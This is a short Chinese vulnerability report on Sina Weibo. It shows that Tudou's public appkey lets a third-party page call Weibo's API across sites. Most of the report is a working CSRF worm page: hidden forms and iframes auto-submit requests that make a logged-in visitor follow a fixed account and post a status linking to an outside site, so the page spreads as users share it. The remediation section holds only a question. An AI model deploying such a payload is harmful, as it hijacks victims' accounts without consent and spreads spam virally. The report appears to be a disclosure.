漏洞:
1.有appkey即可调用接口:
随便点一个土豆网的分享按钮即可看到土豆网的appkey:appkey=2043051649
http://v.t.sina.com.cn/share/share.php?c=spr_web_bd_tudou_weibo&url=http%3A%2F%2Fwww.tudou.com%2Fprograms%2Fview%2FL5PVW-u0ewE%2F%3FresourceId%3D0_03_05_02&title=%E3%80%8A%E6%AF%81%E5%AE%B9%E5%B0%91%E5%A5%B3%E8%BF%9B%E4%BA%AC%E6%B2%BB%E7%96%97%E3%80%8B+%EF%BC%88%E5%8F%AF%E9%80%89%E5%8E%9F%E7%94%BB%E6%B8%85%E6%99%B0%E5%BA%A6%EF%BC%89&source=%E5%9C%9F%E8%B1%86%E7%BD%91&sourceUrl=http%3A%2F%2Fwww.tudou.com%2F&content=gb2312&pic=http%3A%2F%2Fi2.tdimg.com%2F122%2F452%2F239%2Fp.jpg&appkey=2043051649&ralateUid=1692113870
 
2.利用此appkey,制作一个第三方页面,调用微博接口自动跨域提交信息,见代码
 
3.将第三方页面URL,分享至微博,网友即可病毒传播
 
请用测试帐号访问,演示地址:http://weibo.com/1829851507/y8DfIdTWT
漏洞证明：
<html>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- 自动加关注-->
<form action="http://api.t.sina.com.cn/friendships/create.xml?source=2043051649" method="post" id="f" target="ifr">
<input name="user_id" id="fuid">
</form>
<iframe id="ifr" name="ifr"></iframe>
 
 
<!-- 自动发微博-->
<form action="http://api.t.sina.com.cn/statuses/update.xml?source=2043051649" method="post"  id="f2" target="ifr2">
<input name="status" id="updatemsg" value="">
<input name="type" value="discuss">
<input  type="submit">
</form>
<iframe id="ifr2" name="ifr2"></iframe>
 
 
<script>
function update(msg){
       document.getElementById('updatemsg').value=msg;
       document.getElementById('f2').submit();
}
function follow(uid){
       document.getElementById('fuid').value=uid;
       document.getElementById('f').submit();
 
}
update('白静被杀，盘点因情变酿成悲剧的明星们  http://www.2cto.com /?id=' + new Date().getTime());//加关注
follow("1649172451");//自动发微博
</script>
</html>
修复方案：
 
不是禁止cookie方式访问了么,咋还能呢
作者songlv